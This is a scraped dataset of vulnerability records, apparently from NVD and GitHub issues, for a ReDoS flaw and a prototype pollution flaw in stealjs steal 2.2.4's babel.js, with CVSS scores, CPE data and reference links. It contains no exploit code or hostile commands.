[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L54124" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L54129" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1528" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L54124" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L54129" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1528" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*", "matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1333" ]
1333
https://github.com/stealjs/steal/issues/1528
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "stealjs", "steal" ]
A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the string variable in babel.js. The ReDoS vulnerability can be mitigated with several best practices described here: https://snyk.io/blog/redos-and-catastrophic-backtracking/
[CVE-2022-37259]/ReDos found in babel.js
https://api.github.com/repos/stealjs/steal/issues/1528/comments
0
2022-09-14T09:21:22Z
2022-09-14T09:21:22Z
https://github.com/stealjs/steal/issues/1528
1,372,647,305
1,528
4,184
CVE-2022-37265
2022-09-20T18:15:10.270
Prototype pollution vulnerability in stealjs steal 2.2.4 via the alias variable in babel.js.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L4216" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L4569" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1534" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L4216" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L4569" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1534" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*", "matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/stealjs/steal/issues/1534
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "stealjs", "steal" ]
Prototype pollution vulnerability in stealjs steal 2.2.4 via the alias variable in babel.js. The prototype pollution vulnerability can be mitigated with several best practices described here: https://learn.snyk.io/lessons/prototype-pollution/javascript/
[CVE-2022-37265]/ Prototype pollution found in babel.js
https://api.github.com/repos/stealjs/steal/issues/1534/comments
0
2022-09-14T09:47:08Z
2022-09-14T09:47:08Z
https://github.com/stealjs/steal/issues/1534
1,372,684,258
1,534
4,185